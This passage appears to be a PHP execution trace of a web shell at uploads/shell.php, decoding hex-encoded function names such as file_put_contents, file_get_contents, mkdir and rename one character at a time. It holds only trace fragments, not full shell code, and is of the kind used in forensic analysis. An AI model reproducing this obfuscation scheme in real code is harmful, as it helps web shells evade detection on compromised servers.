3 231 0 0.008800 480680 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 231 1 0.008811 480720
3 231 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 232 0 0.008840 480712 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 232 1 0.008851 480760
3 232 R 116
3 233 0 0.008863 480680 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 233 1 0.008874 480720
3 233 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 234 0 0.008905 480712 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 234 1 0.008917 480760
3 234 R 115
3 235 0 0.008929 480680 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 235 1 0.008940 480720
3 235 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 213 1 0.008969 480680
2 213 R 'file_exists'
1 A /var/www/html/uploads/shell.php 8 $fc[12] = 'file_exists'
1 A /var/www/html/uploads/shell.php 7 $i++
2 236 0 0.009002 480680 nhx 1 /var/www/html/uploads/shell.php 8 1 '66696c655f7075745f636f6e74656e7473'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 33
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 237 0 0.009042 480712 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 237 1 0.009053 480760
3 237 R 102
3 238 0 0.009065 480680 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 238 1 0.009076 480720
3 238 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 239 0 0.009106 480744 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 239 1 0.009118 480792
3 239 R 105
3 240 0 0.009130 480712 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 240 1 0.009141 480752
3 240 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 241 0 0.009170 480744 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 241 1 0.009182 480792
3 241 R 108
3 242 0 0.009194 480712 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 242 1 0.009205 480752
3 242 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 243 0 0.009234 480744 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 243 1 0.009246 480792
3 243 R 101
3 244 0 0.009260 480712 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 244 1 0.009272 480752
3 244 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 245 0 0.009303 480744 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 245 1 0.009315 480792
3 245 R 95
3 246 0 0.009397 480712 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 246 1 0.009409 480752
3 246 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 247 0 0.009440 480744 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 247 1 0.009452 480792
3 247 R 112
3 248 0 0.009464 480712 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 248 1 0.009475 480752
3 248 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 249 0 0.009504 480744 hexdec 0 /var/www/html/uploads/shell.php 27 1 '75'
3 249 1 0.009515 480792
3 249 R 117
3 250 0 0.009527 480712 chr 0 /var/www/html/uploads/shell.php 27 1 117
3 250 1 0.009538 480752
3 250 R 'u'
2 A /var/www/html/uploads/shell.php 27 $r .= 'u'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 251 0 0.009567 480744 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 251 1 0.009578 480792
3 251 R 116
3 252 0 0.009590 480712 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 252 1 0.009602 480752
3 252 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 253 0 0.009631 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 253 1 0.009643 480800
3 253 R 95
3 254 0 0.009655 480720 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 254 1 0.009666 480760
3 254 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 255 0 0.009704 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '63'
3 255 1 0.009716 480800
3 255 R 99
3 256 0 0.009728 480720 chr 0 /var/www/html/uploads/shell.php 27 1 99
3 256 1 0.009739 480760
3 256 R 'c'
2 A /var/www/html/uploads/shell.php 27 $r .= 'c'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 257 0 0.009768 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6f'
3 257 1 0.009780 480800
3 257 R 111
3 258 0 0.009792 480720 chr 0 /var/www/html/uploads/shell.php 27 1 111
3 258 1 0.009803 480760
3 258 R 'o'
2 A /var/www/html/uploads/shell.php 27 $r .= 'o'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 259 0 0.009832 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6e'
3 259 1 0.009844 480800
3 259 R 110
3 260 0 0.009856 480720 chr 0 /var/www/html/uploads/shell.php 27 1 110
3 260 1 0.009867 480760
3 260 R 'n'
2 A /var/www/html/uploads/shell.php 27 $r .= 'n'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 261 0 0.009896 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 261 1 0.009907 480800
3 261 R 116
3 262 0 0.009919 480720 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 262 1 0.009930 480760
3 262 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 263 0 0.009959 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 263 1 0.009970 480800
3 263 R 101
3 264 0 0.009982 480720 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 264 1 0.009993 480760
3 264 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 265 0 0.010022 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6e'
3 265 1 0.010033 480800
3 265 R 110
3 266 0 0.010045 480720 chr 0 /var/www/html/uploads/shell.php 27 1 110
3 266 1 0.010056 480760
3 266 R 'n'
2 A /var/www/html/uploads/shell.php 27 $r .= 'n'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 267 0 0.010085 480752 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 267 1 0.010097 480800
3 267 R 116
3 268 0 0.010109 480720 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 268 1 0.010120 480760
3 268 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 269 0 0.010149 480760 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 269 1 0.010161 480808
3 269 R 115
3 270 0 0.010173 480728 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 270 1 0.010184 480768
3 270 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 236 1 0.010213 480728
2 236 R 'file_put_contents'
1 A /var/www/html/uploads/shell.php 8 $fc[13] = 'file_put_contents'
1 A /var/www/html/uploads/shell.php 7 $i++
2 271 0 0.010248 480728 nhx 1 /var/www/html/uploads/shell.php 8 1 '66696c655f6765745f636f6e74656e7473'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 33
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 272 0 0.010289 480760 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 272 1 0.010300 480808
3 272 R 102
3 273 0 0.010313 480728 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 273 1 0.010324 480768
3 273 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 274 0 0.010354 480792 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 274 1 0.010366 480840
3 274 R 105
3 275 0 0.010379 480760 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 275 1 0.010391 480800
3 275 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 276 0 0.010424 480792 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 276 1 0.010436 480840
3 276 R 108
3 277 0 0.010500 480760 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 277 1 0.010514 480800
3 277 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 278 0 0.010546 480792 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 278 1 0.010559 480840
3 278 R 101
3 279 0 0.010571 480760 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 279 1 0.010583 480800
3 279 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 280 0 0.010612 480792 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 280 1 0.010625 480840
3 280 R 95
3 281 0 0.010637 480760 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 281 1 0.010648 480800
3 281 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 282 0 0.010678 480792 hexdec 0 /var/www/html/uploads/shell.php 27 1 '67'
3 282 1 0.010690 480840
3 282 R 103
3 283 0 0.010702 480760 chr 0 /var/www/html/uploads/shell.php 27 1 103
3 283 1 0.010713 480800
3 283 R 'g'
2 A /var/www/html/uploads/shell.php 27 $r .= 'g'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 284 0 0.010742 480792 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 284 1 0.010754 480840
3 284 R 101
3 285 0 0.010765 480760 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 285 1 0.010776 480800
3 285 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 286 0 0.010805 480792 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 286 1 0.010816 480840
3 286 R 116
3 287 0 0.010828 480760 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 287 1 0.010839 480800
3 287 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 288 0 0.010868 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 288 1 0.010880 480848
3 288 R 95
3 289 0 0.010892 480768 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 289 1 0.010903 480808
3 289 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 290 0 0.010932 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '63'
3 290 1 0.010943 480848
3 290 R 99
3 291 0 0.010955 480768 chr 0 /var/www/html/uploads/shell.php 27 1 99
3 291 1 0.010966 480808
3 291 R 'c'
2 A /var/www/html/uploads/shell.php 27 $r .= 'c'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 292 0 0.010995 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6f'
3 292 1 0.011007 480848
3 292 R 111
3 293 0 0.011019 480768 chr 0 /var/www/html/uploads/shell.php 27 1 111
3 293 1 0.011029 480808
3 293 R 'o'
2 A /var/www/html/uploads/shell.php 27 $r .= 'o'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 294 0 0.011058 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6e'
3 294 1 0.011070 480848
3 294 R 110
3 295 0 0.011082 480768 chr 0 /var/www/html/uploads/shell.php 27 1 110
3 295 1 0.011093 480808
3 295 R 'n'
2 A /var/www/html/uploads/shell.php 27 $r .= 'n'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 296 0 0.011122 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 296 1 0.011134 480848
3 296 R 116
3 297 0 0.011146 480768 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 297 1 0.011157 480808
3 297 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 298 0 0.011186 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 298 1 0.011203 480848
3 298 R 101
3 299 0 0.011215 480768 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 299 1 0.011226 480808
3 299 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 300 0 0.011262 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6e'
3 300 1 0.011274 480848
3 300 R 110
3 301 0 0.011286 480768 chr 0 /var/www/html/uploads/shell.php 27 1 110
3 301 1 0.011297 480808
3 301 R 'n'
2 A /var/www/html/uploads/shell.php 27 $r .= 'n'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 302 0 0.011326 480800 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 302 1 0.011337 480848
3 302 R 116
3 303 0 0.011349 480768 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 303 1 0.011360 480808
3 303 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 304 0 0.011389 480808 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 304 1 0.011400 480856
3 304 R 115
3 305 0 0.011412 480776 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 305 1 0.011423 480816
3 305 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 271 1 0.011452 480776
2 271 R 'file_get_contents'
1 A /var/www/html/uploads/shell.php 8 $fc[14] = 'file_get_contents'
1 A /var/www/html/uploads/shell.php 7 $i++
2 306 0 0.011488 480776 nhx 1 /var/www/html/uploads/shell.php 8 1 '6d6b646972'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 9
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 307 0 0.011528 480808 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6d'
3 307 1 0.011540 480856
3 307 R 109
3 308 0 0.011552 480776 chr 0 /var/www/html/uploads/shell.php 27 1 109
3 308 1 0.011563 480816
3 308 R 'm'
2 A /var/www/html/uploads/shell.php 27 $r .= 'm'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 309 0 0.011592 480840 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6b'
3 309 1 0.011604 480888
3 309 R 107
3 310 0 0.011616 480808 chr 0 /var/www/html/uploads/shell.php 27 1 107
3 310 1 0.011627 480848
3 310 R 'k'
2 A /var/www/html/uploads/shell.php 27 $r .= 'k'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 311 0 0.011657 480840 hexdec 0 /var/www/html/uploads/shell.php 27 1 '64'
3 311 1 0.011668 480888
3 311 R 100
3 312 0 0.011680 480808 chr 0 /var/www/html/uploads/shell.php 27 1 100
3 312 1 0.011691 480848
3 312 R 'd'
2 A /var/www/html/uploads/shell.php 27 $r .= 'd'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 313 0 0.011720 480840 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 313 1 0.011731 480888
3 313 R 105
3 314 0 0.011743 480808 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 314 1 0.011754 480848
3 314 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 315 0 0.011783 480840 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 315 1 0.011795 480888
3 315 R 114
3 316 0 0.011807 480808 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 316 1 0.011818 480848
3 316 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 306 1 0.011847 480808
2 306 R 'mkdir'
1 A /var/www/html/uploads/shell.php 8 $fc[15] = 'mkdir'
1 A /var/www/html/uploads/shell.php 7 $i++
2 317 0 0.011880 480808 nhx 1 /var/www/html/uploads/shell.php 8 1 '72656e616d65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 11
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 318 0 0.011928 480840 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 318 1 0.011940 480888
3 318 R 114
3 319 0 0.011952 480808 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 319 1 0.011963 480848
3 319 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 320 0 0.011993 480872 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 320 1 0.012005 480920
3 320 R 101
3 321 0 0.012017 480840 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 321 1 0.012028 480880
3 321 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 322 0 0.012057 480872 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6e'
3 322 1 0.012068 480920
3 322 R 110
3 323 0 0.012080 480840 chr 0 /var/www/html/uploads/shell.php 27 1 110
3 323 1 0.012091 480880
3 323 R 'n'
2 A /var/www/html/uploads/shell.php 27 $r .= 'n'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 324 0 0.012120 480872 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 324 1 0.012131 480920
3 324 R 97
3 325 0 0.012143 480840 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 325 1 0.012154 480880
3 325 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 326 0 0.012183 480872 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6d'
3 326 1 0.012195 480920
3 326 R 109
3 327 0 0.012207 480840 chr 0 /var/www/html/uploads/shell.php 27 1 109
3 327 1 0.012219 480880
3 327 R 'm'
2 A /var/www/html/uploads/shell.php 27 $r .= 'm'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 328 0 0.012248 480872 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 328 1 0.012259 480920
3 328 R 101
3 329 0 0.012271 480840 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 329 1 0.012282 480880
3 329 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 317 1 0.012312 480840
2 317 R 'rename'
1 A /var/www/html/uploads/shell.php 8 $fc[16] = 'rename'
1 A /var/www/html/uploads/shell.php 7 $i++
2 330 0 0.012344 480840 nhx 1 /var/www/html/uploads/shell.php 8 1 '737472746f74696d65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 17
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 331 0 0.012384 480872 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 331 1 0.012395 480920
3 331 R 115
3 332 0 0.012407 480840 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 332 1 0.012418 480880
3 332 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 333 0 0.012447 480904 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 333 1 0.012459 480952
3 333 R 116
3 334 0 0.012471 480872 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 334 1 0.012482 480912
3 334 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 335 0 0.012511 480904 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 335 1 0.012522 480952
3 335 R 114
3 336 0 0.012535 480872 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 336 1 0.012545 480912
3 336 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 337 0 0.012575 480904 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 337 1 0.012586 480952
3 337 R 116
3 338 0 0.012599 480872 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 338 1 0.012610 480912
3 338 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 339 0 0.012643 480904 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6f'
3 339 1 0.012655 480952
3 339 R 111
3 340 0 0.012667 480872 chr 0 /var/www/html/uploads/shell.php 27 1 111
3 340 1 0.012678 480912
3 340 R 'o'
2 A /var/www/html/uploads/shell.php 27 $r .= 'o'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 341 0 0.012707 480904 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 341 1 0.012718 480952
3 341 R 116
3 342 0 0.012730 480872 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 342 1 0.012741 480912
3 342 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 343 0 0.012770 480904 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 343 1 0.012781 480952
3 343 R 105
3 344 0 0.012793 480872 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 344 1 0.012804 480912
3 344 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 345 0 0.012833 480904 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6d'
3 345 1 0.012844 480952
3 345 R 109
3 346 0 0.012856 480872 chr 0 /var/www/html/uploads/shell.php 27 1 109
3 346 1 0.012867 480912
3 346 R 'm'
2 A /var/www/html/uploads/shell.php 27 $r .= 'm'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 347 0 0.012896 480912 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 347 1 0.012908 480960
3 347 R 101
3 348 0 0.012920 480880 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 348 1 0.012930 480920
3 348 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 330 1 0.012959 480880
2 330 R 'strtotime'
1 A /var/www/html/uploads/shell.php 8 $fc[17] = 'strtotime'
1 A /var/www/html/uploads/shell.php 7 $i++
2 349 0 0.012992 480880 nhx 1 /var/www/html/uploads/shell.php 8 1 '68746d6c7370656369616c6368617273'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 31
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 350 0 0.013032 480912 hexdec 0 /var/www/html/uploads/shell.php 27 1 '68'
3 350 1 0.013044 480960
3 350 R 104
3 351 0 0.013057 480880 chr 0 /var/www/html/uploads/shell.php 27 1 104
3 351 1 0.013067 480920
3 351 R 'h'
2 A /var/www/html/uploads/shell.php 27 $r .= 'h'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 352 0 0.013097 480944 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 352 1 0.013108 480992
3 352 R 116
3 353 0 0.013120 480912 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 353 1 0.013131 480952
3 353 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 354 0 0.013160 480944 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6d'
3 354 1 0.013172 480992
3 354 R 109
3 355 0 0.013184 480912 chr 0 /var/www/html/uploads/shell.php 27 1 109
3 355 1 0.013195 480952
3 355 R 'm'
2 A /var/www/html/uploads/shell.php 27 $r .= 'm'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 356 0 0.013224 480944 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 356 1 0.013235 480992
3 356 R 108
3 357 0 0.013247 480912 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 357 1 0.013258 480952
3 357 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 358 0 0.013287 480944 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 358 1 0.013299 480992
3 358 R 115
3 359 0 0.013337 480912 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 359 1 0.013350 480952
3 359 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 360 0 0.013383 480944 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 360 1 0.013395 480992
3 360 R 112
3 361 0 0.013408 480912 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 361 1 0.013418 480952
3 361 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 362 0 0.013447 480944 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 362 1 0.013459 480992
3 362 R 101
3 363 0 0.013470 480912 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 363 1 0.013481 480952
3 363 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 364 0 0.013509 480944 hexdec 0 /var/www/html/uploads/shell.php 27 1 '63'
3 364 1 0.013521 480992
3 364 R 99
3 365 0 0.013533 480912 chr 0 /var/www/html/uploads/shell.php 27 1 99
3 365 1 0.013544 480952
3 365 R 'c'
2 A /var/www/html/uploads/shell.php 27 $r .= 'c'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 366 0 0.013572 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 366 1 0.013584 481000
3 366 R 105
3 367 0 0.013596 480920 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 367 1 0.013607 480960
3 367 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 368 0 0.013636 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 368 1 0.013648 481000
3 368 R 97
3 369 0 0.013659 480920 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 369 1 0.013670 480960
3 369 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 370 0 0.013699 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 370 1 0.013711 481000
3 370 R 108
3 371 0 0.013722 480920 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 371 1 0.013733 480960
3 371 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 372 0 0.013762 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '63'
3 372 1 0.013773 481000
3 372 R 99
3 373 0 0.013785 480920 chr 0 /var/www/html/uploads/shell.php 27 1 99
3 373 1 0.013796 480960
3 373 R 'c'
2 A /var/www/html/uploads/shell.php 27 $r .= 'c'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 374 0 0.013824 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '68'
3 374 1 0.013836 481000
3 374 R 104
3 375 0 0.013848 480920 chr 0 /var/www/html/uploads/shell.php 27 1 104
3 375 1 0.013859 480960
3 375 R 'h'
2 A /var/www/html/uploads/shell.php 27 $r .= 'h'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 376 0 0.013888 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 376 1 0.013899 481000
3 376 R 97
3 377 0 0.013911 480920 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 377 1 0.013921 480960
3 377 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 378 0 0.013950 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 378 1 0.013962 481000
3 378 R 114
3 379 0 0.013974 480920 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 379 1 0.013985 480960
3 379 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 380 0 0.014014 480952 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 380 1 0.014026 481000
3 380 R 115
3 381 0 0.014038 480920 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 381 1 0.014049 480960
3 381 R 's'
